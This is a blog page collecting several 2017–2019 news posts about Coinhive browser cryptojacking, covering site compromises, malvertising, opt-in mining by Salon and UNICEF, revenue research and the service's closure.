Posted on

Crypto Mining Malware Has Plummeted Since Coinhive Closure


Along with crypto prices, mining malware has also tanked
recently but not because of the bear market. According to new research the
chances of your browser being hijacked are far lower now that one major crypto
scourge has gone offline.

Cyber security firm Malwarebytes has revealed that crypto
mining attacks have plummeted by 79 percent compared to the same time a year
ago. The report
added that the primary reason for the decline was the closure of Coinhive last

“Marked by the popular drive-by mining company CoinHive shutting down operations in early March, consumer cryptomining seems to have gone the way of the dodo. Detections of consumer-focused Bitcoin miners have dropped significantly over the last year and even from last quarter,” it added.

Coinhive allowed webmasters to install a script that would
harness the computing resources of anyone viewing the website, often without
their knowledge. This would enable them to make a little extra revenue by mining
Monero on the sly
. As Coinhive grew antivirus companies started blocking
the scripts which became hugely popular in 2017 and 2018.

Since then however Malwarebytes has said that numbers have
fallen dramatically; “We went from tens of millions of blocks to an
estimated two million per day,” the firm told PC Mag. Coinhive announced
its demise in February this year citing the ongoing bear market and increased
difficulties in mining Monero due to the latest XMR hark fork. Similar research
suggests that the profitability in Monero mining has fallen significantly along
with its prices. At the time of writing XMR was trading at $62, a long way down
from its peak of almost $500.

A number of similar scripts have since appeared that emulate
Coinhive. Instead of targeting compromised websites new versions such as
CoinIMP and CryptoLoot are using torrent portals or file hosting services. In
February a fake
version of Metamask
was found lurking on the Google Play Store. According
to security firm Check Point, Coinhive scripts could be revived if crypto
prices skyrocket again;

“Despite its closure, the Coinhive JavaScript code is still in place on many websites. No mining is taking place, but if the value of Monero increases significantly, it is possible that Coinhive may come back to life,”

Ledger Detects Desktop Malware

In a related story crypto wallet provider Ledger has detected
malware that targets its desktop application. The firm warned users that the
malware replaces the genuine software with a malicious version that asks for
users to enter their 24 word passphrase after a bogus update.

At the time only Windows machines appeared to be infected
and the malware does not mine or steal cryptocurrency. It attempts to use
social engineering to lure users into giving up their passphrase.

The post Crypto Mining Malware Has Plummeted Since Coinhive Closure appeared first on Ethereum World News.

Posted on

Monero (XMR) Coinhive Miner Rakes In Over $120,000 A Month

Many individuals fall under the false impression that crypto mining operations are solely operated by large corporations with data centers that can be likened to a mansion. However, this is far from the case, as there are methods of mining that can be used to garner cryptocurrencies, like Monero, through any old computer system.

Image from Marco Verch

One such method is through Coinhive, which is a Javascript-based miner that is often situated on sites across the web. For those who are unaware, Coinhive, which was released in 2017, is a Monero-focused mining script that is specifically targeted at websites looking to make money without running advertisements. Although there has been a dramatic decrease in the prices of cryptocurrencies, Monero included, the script is still used en-masse today.

According to a report from Germany’s RWTH Aachen University, which was relayed by The Next Web, Coinhive-based miners make up a hefty 1.18% of the total hashing power of the Monero blockchain. While 1% may not sound like anything extraordinary, it is surprising considering that the crypto mining industry is backed by billions of dollars. Moreover, Monero miners account for 75% of all browser-based crypto mining operations.

Upon further discussion, academics noted that after an in-depth analysis of the Monero network that Coinhive could generate upwards of 300 XMR each week. This translates to approximately $29,000 a week, $120,000 a month, and $1.4 million each year at August 17th prices (1 XMR = $96). The report elaborated, noting:

“If we sum up the block rewards of the actually mined blocks over the observation period of [four] weeks, we find that Coinhive [sic] earned 1,271 XMR.”

While website owners utilizing the script have been raking in XMR, the developers behind CoinHive also integrated a function where they get 30% of all mined cryptocurrencies. As such, it is speculated that the developers behind the project have garnered hundreds of thousands of dollars in XMR since its release.

Hackers And Coinhive’s ‘Short Link’ Feature

Despite Coinhive’s developers originally creating the script with good intent, it quickly became a method for hackers acting in malintent to buff their own cryptocurrency wallets. These hackers often secretly integrate Coinhive code onto websites to infect thousands of computers, forcing the devices of unsuspecting victims to mine for a hacker’s personal gain. This is an attack vector of choice because setting up an XMR Coinhive miner is relatively easy and transactions are kept confidential on the Monero blockchain.

According to the aforementioned report, CoinHive can operate using a so-called ‘short link’ system, where a user is required to unknowingly or knowingly submit a varied amount of hashes to the Monero network to reach a specific website.

Upon analysis of the nearly two million active short links, academics found that a majority of these short links are directed to shady sites, indicating how widespread the cryptojacking dilemma may have become. Additionally, the majority of the XMR garnered through the aforementioned two million short links are reportedly directed to 10 individuals.

To stop your computer from being cryptojacked, either through short links, malicious download or infected websites, security researcher Troy Mursch recommends the minerBlock browser extension, that utilizes a Javascript detector to stave off all cryptojacking attempts.


Posted on

The rise in Cryptojacking Attacks Linked to Unsecured Mobile Apps

One company believes that unsecured mobile apps are to blame for the surge in cryptocurrency mining attacks aka cryptojacking. Other internet security experts also report that unless drastic measures are taken, the attacks will only become more severe.

Coinhive Leads the Way in Cryptojacking Attacks

Amidst the price saga of 2018, the rise of cryptojacking has been another highlight of the burgeoning cryptocurrency industry. There have been numerous cryptocurrency mining hacks reported in the first half of the year. The second quarter of 2018 has seen a dramatic rise in these attacks as cybercriminals have developed even more sophisticated mining exploits.

According to California-based cybersecurity firm, Proofpoint Inc., there has been a 460m percent surge in Coinhive-based cryptojacking attacks. The firm also reveals that a large percentage of these attacks are carried out via mobile phone apps. The apps mine cryptocurrency, usually Monero – a privacy-centric coin, in the background while the phone is in operation.

Earlier in 2018, the company announced that there were 19 smartphone apps infected with Coinhive malware. These apps have since been removed from the Google Play Store. However, Proofpoint reports that Coinhive activity seems to be increasing, even experiencing a massive spike in May.

Commenting on the situation, Sherrod DeGrippo of Proofpoint said:

Cybercriminals are following the money and right now Coinhive is a road to success. Coinhive traffic has also likely increased recently because the damage it inflicts isn’t immediately apparent, but it is profitable. Ransomware, for example, is extremely disruptive and banking Trojans are much more difficult to monetize.

According to Mike Pound, a Professor at the University of Nottingham specializing in computing technology, the spate of cryptojacking is not unexpected.

It doesn’t surprise me that malware creators are moving away from simple in-browser scripts by burying mining code in apps and other banking malware. These kinds of attacks are only going to become more prevalent when this script is bundled into other malware as an add-on. It’s an efficient route to profit for criminals.

Cryptojacking: A Clear and Present Danger to the Cryptocurrency Industry

Both Google and Apple have had to remove malware-infected apps from their respective online stores. With the increase in the prices of cryptos last year, cybercriminals seem evermore desperate to acquire coins by any means necessary. Tech behemoths like Microsoft and Tesla have also had their cloud platforms infected with cryptojacking malware.

Most of the cryptocurrency mining hacks are centered on mining Monero. In March 2018, researchers discovered more than 50,000 websites infected with malicious mining scripts. However, based on Proofpoint’s findings, it seems like the attackers have upped their game significantly.

It is incumbent on internet users to be safety conscious while online. Many browser stores have plugins and add-ons that can protect computers from cryptojacking attacks. People can also endeavor to download apps only from reputable online stores.

Do you agree with Proofpoint’s analysis that shows mobile phone apps are to blame for the ubiquity of cryptojacking attacks? What steps do you think people can take to prevent falling victim to crypto mining hacks? Keep the conversation going in the comment section below.

Image courtesy of


Posted on

'Cryptojacking' Software Attack Hits Hundreds of Websites

Hackers have injected hundreds of websites running the Drupal content management system with malicious software used to mine the cryptocurrency monero.

This latest incident was uncovered by Troy Mursch, the security researcher behind the website Bad Packets Report. He wrote Saturday that more than 300 sites had been compromised by hackers who installed the browser mining software Coinhive, which mines the cryptocurrency monero, by exploiting a vulnerability in an outdated version of the Drupal content management system (CMS).

Cryptojacking,” as similar attacks are called, has become a common problem in recent months. Whereas hackers used to favor ransom attacks – in which they would scramble victims’ data and demand ransoms in bitcoin or another cryptocurrency in order to decrypt it – they now increasingly infect websites with software that harnesses visitors’ computers to mine cryptocurrency on the attackers’ behalf.

Mursch told CoinDesk that while cryptojacking is not as overt as ransomware, it “continues to be a problem – especially for website operators.”

He explained:

“This is because Coinhive and other cryptojacking services (malware) are simply done with JavaScript. Every modern browser and device can run JavaScript, so as such, everybody can mine cryptocurrency and unfortunately Coinhive has been used and abused time and time again. [In] this particular case, Drupal users need to update [as soon as possible].”

Affected sites include the San Diego Zoo, the National Labor Relations Board, the City of Marion, Ohio, the University of Aleppo, the Ringling College of Art and Design and the government of Chihuahua, Mexico. A full list of affected sites is available on this spreadsheet.

Visitors to affected websites may not even notice that their computers are running the cryptographic functions used to generate monero for hackers. The attacks slow users computers down, however, and can cause wear and tear on computers’ processors.

Not all Coinhive users are malicious, however. Salon, a news outlet, and UNICEF use the software to raise funds, but only run it with visitors’ permission.

Hacker image via Shutterstock.

The leader in blockchain news, CoinDesk is a media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. CoinDesk is an independent operating subsidiary of Digital Currency Group, which invests in cryptocurrencies and blockchain startups.

Posted on

UNICEF Is Mining Crypto to Raise Funds for Children

The United Nations Children’s Fund (UNICEF) is seeking to harness supporters’ computers to raise donations via cryptocurrency mining.

To that end, the organization has launched “The Hope Page” – a website that mines cryptocurrency with the help of visitors’ computer processing power. The non-profit described in a statement that site will “allow Australians to provide help and hope to vulnerable children by simply opening the page while they are online”, ITnews Australia stated.

According to the website, Hope Page allows visitors to select how much processing power they want to contribute to the mining process. The longer they stay on the site, the more cryptocurrency is mined.

UNICEF states:

“Mining is perfectly safe for your computer. If you’re ever worried about power consumption, turn down the amount of processing power you’re donating.”

Any cryptocurrency mined is turned into fiat currency and donated to UNICEF Australia to be used for help vulnerable children worldwide with life-saving supplies such as safe drinking water, food and vaccines.

The browser miner is powered by an opt-in version of the Coinhive API, AuthedMine, and mines the monero cryptocurrency.

According to Jennifer Tierney, director of fundraising and communications for UNICEF Australia, the organization had been seeking to use emerging technologies to raise awareness about current humanitarian crises and collect donations to support affected children.

At press time, over 1,600 people were seen donating computer power to aid the organization.

UNICEF tent image via Shutterstock

The leader in blockchain news, CoinDesk is a media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. CoinDesk is an independent operating subsidiary of Digital Currency Group, which invests in cryptocurrencies and blockchain startups.

Posted on

Researcher Finds Nearly 50,000 Websites Running Cryptocurrency Mining Malware

Troy Mursch from Bad Packets Report recently conducted an investigation, in which he found that the ongoing cryptojacking trend has infected nearly 50,000 websites. According to his report, 48,953 websites are running cryptocurrency mining malware.

Cryptocurrency mining malware essentially consists of a few lines of JavaScript code that allow a website’s admin to use its visitors’ computer resources to mine privacy-centric cryptocurrencies, the most popular one being Monero (XMR).

Mursch’s research was made using source-code search engine PublicWWW. Using it, he scanned the web for pages running cryptocurrency mining malware. Out of the 48,953 affected websites he found, 7,368 are powered by WordPress.

The researcher further revealed that Coinhive is the most widespread mining script out there. It accounts for nearly 40,000 infected websites, which roughly translates to 81 percent of all cases. Back in November, Mursch’s research found 30,000 websites running Coinhive’s script.

The remaining 19 percent of websites were found to be running Coinhive alternatives, like Crypto-Loot, CoinImp, Minr, and deepMiner. The report reads:

“The four Coinhive clones discussed were found on a total of 9,028 websites. CoinImp had the largest market share at roughly 45% while Minr had the smallest at nearly 8%. Crypto-Loot and deepMiner shared the remaining portions at nearly 23% a piece.”

The researcher published a document on PasteBin, detailing all WordPress websites infected with the cryptocurrency mining malware. The document notes that some have already removed the malware, although most are still likely to mine with user’s computers. “Browse at your own risk,” the document reads.

Per the researcher, users looking to protect themselves from the ongoing cryptojacking trend should install the minerBlock extension for Chrome and Firefox. Browsers like Opera and Brave already have built-in tools that block mining attempts as well.

The ongoing cryptojacking trend has been making headlines for affecting high-profile victims, including government websites last month. As reported, Tesla was also hit with a cryptocurrency mining malware attack, as hackers used its cloud to mine.

As covered by Ethereum World News, hackers aren’t just using people’s CPUs to mine Monero. They are now stuffing Monero ransom notes inside distributed denial of service (DDoS) attacks, to get victims to pay them to stop.

Posted on

Salon Offers Readers Choice Between Ads and Mining Monero

Digital media publication Salon is offering its visitors an alternative to traditional online ads: allowing the site to use their computer processing power to mine cryptocurrency.

In order to provide free content, Salon primarily depended on advertisements to run its servers, the company explained in a blog post published on Monday. However, digital ads are insufficient to fully pay for most media outlets – the site noted that ad revenue fell $40 billion from 1999 to 2010 – and Salon, in particular, has decided to offer users a new option to pay for content.

Salon will profit by selling “a small percentage of [users’] spare processing power to contribute to the advancement of technological discovery, evolution and innovation,” the company explained. While they don’t come out and say it directly, the site, according to The Verge, is using the open-source CoinHive software in order to mine the cryptocurrency monero.

“The demand for computing power across many different industries and applications is potentially very high. We intend to use a small percentage of your spare processing power to contribute to the advancement of technological discovery, evolution and innovation. For our beta program, we’ll start by applying your processing power to help support the evolution and growth of blockchain technology and cryptocurrencies,” the company wrote on the blog.

In contrast with the malware approach, which seeks to use as much of a computer’s processing power as possible in order to maximize the return drawn from mining, Salon says it will eschew that by actively adjusting how much processing power is being used by their crypto-miner, explaining:

“We automatically detect your current processing usage and assign a portion of what you are not using to this process. Should you begin a process that requires more of your computer’s resources, we automatically reduce the amount we are using for calculations.”

Coinhive is one of the most-used browser-based mining programs, as previously reported by CoinDesk. The service offers a Javascript-based application which website owners can embed on their sites.

However, the developers reportedly did not expect malicious actors to take advantage of the platform as much as they have. The developers preferred that websites are up-front about their use of the miner, according to a story from Motherboard.

Mining data image via Shutterstock

The leader in blockchain news, CoinDesk is an independent media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. Have breaking news or a story tip to send to our journalists? Contact us at

Posted on

UK Government Websites Hit By Cryptocurrency Mining Malware

U.K. government websites and more than 4,000 others worldwide have reportedly been exploited by malware that harnesses visitors’ computers to mine cryptocurrency.

According to BBC, the incident was first revealed after British security researcher Scott Helme, who raised the alarm that users browsing the website of the U.K. Information Commissioner’s Office (ICO) are affected by the malware, dubbed Coinhive, which illicitly mines the anonymous cryptocurrency Monero.

The ICO subsequently closed its website when the issue was revealed, the report indicates. At press time, the site was still down, citing “maintenance.”

The BBC said the malware spread after having compromised a website plug-in service named Browsealoud, which is used to help blind or partially sighted users access website content.

According to the report, the maker of the plug-in, Texthelp, confirmed that its product was breached for four hours by the mining malware. Helme said the malware had now been disabled.

In addition to the ICO website, the report said other British sites are also affected, including the Student Loans Company and Barnsley Hospital, as well as thousands of others worldwide.

According to another report from Australian news source, several government sites in Queensland, as well as the Victorian Parliament, also appeared to have been affected.

According to a November 2017 report, Coinhive has become the sixth most common form of malware. It has previously been discovered in Google ads, the Ultimate Fighting Championship website and TV network Showtime, among many others.

Hacker image via Shutterstock

The leader in blockchain news, CoinDesk is an independent media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. Have breaking news or a story tip to send to our journalists? Contact us at

Posted on

Google's DoubleClick Ads Used to Distribute Crypto Mining Malware

Security firm TrendMicro stated in a new report that Google’s DoubleClick ad services were used to distribute cryptocurrency mining malware to a number of users in Europe and Asia.

On its Security and Intelligence Blog, the company outlined how CoinHive – a JavaScript program that works in the background of a website and uses a computer’s processing power to mine monero – was distributed by attackers who appropriated Google’s DoubleClick. Significantly, miners like CoinHive operate without a user’s consent or knowledge.

Google’s DoubleClick ad services are also used by YouTube, the world’s most popular video sharing service, and the miner impacted a number of users on the site, according to ArsTechnica.

A “separate web miner that connects to a private pool” was also involved in the scheme, according to TrendMicro’s report.

The “malvertisement” incorporated two different web miner scripts in addition to the actual advertisement, according to the report.

It continued:

“The affected webpage will show the legitimate advertisement while the two web miners covertly perform their task. We speculate that the attackers’ use of these advertisements on legitimate websites is a ploy to target a larger number of users, in comparison to only that of compromised devices. The traffic involving the abovementioned cryptocurrency miners has since decreased after January 24”.

As much as 80 percent of an affected computer’s processing power can be taken over when exposed, reducing the machine’s performance, according to the report.

Clandestine cryptocurrency mining has been on the rise in recent months, as previously reported. Companies such as oil pipeline giant Transneft have seen their systems affected by the malware, and a report from November suggested that CoinHive has become one of the more common pieces of malware in circulation today.

Malware image via Shutterstock

The leader in blockchain news, CoinDesk is an independent media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. Have breaking news or a story tip to send to our journalists? Contact us at

Posted on

CoinHive Cryptocurrency Miner Is 6th Most Common Malware, Says Report

Cyber-security solutions provider Check Point Software has said that the threat from cryptocurrency mining malware is rapidly growing.

According to the company’s latest Global Threat Impact Index report, the CoinHive variant became the sixth most-used malware in October. CoinHive – a JavaScript program that lurks unseen on websites – works by tapping the processing power of visitors’ computers to mine monero.

Maya Horowitz, threat intelligence group manager at Check Point, said in a press release that the emergence of mining malware like CoinHive highlights the “need for advanced threat prevention technologies” to curb such practices and protect networks from cyber-criminals.

Horowitz added:

“Crypto mining is a new, silent, yet significant actor in the threat landscape, allowing threat actors to make significant revenues while victims’ endpoints and networks suffer from latency and decreased performance.”

According to the report, malware variant RoughTed (adware) topped the index, followed by Locky (ransomware) and Seamless (traffic redirection).

Recently, internet domain provider Cloudflare suspended websites that ran hidden cryptocurrency miners, including that of the operator of torrent site ProxyBunker. This site was said to be running the Coinhive miner for four days prior to the suspension.

Malware image via Shutterstock

The leader in blockchain news, CoinDesk is an independent media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. Have breaking news or a story tip to send to our journalists? Contact us at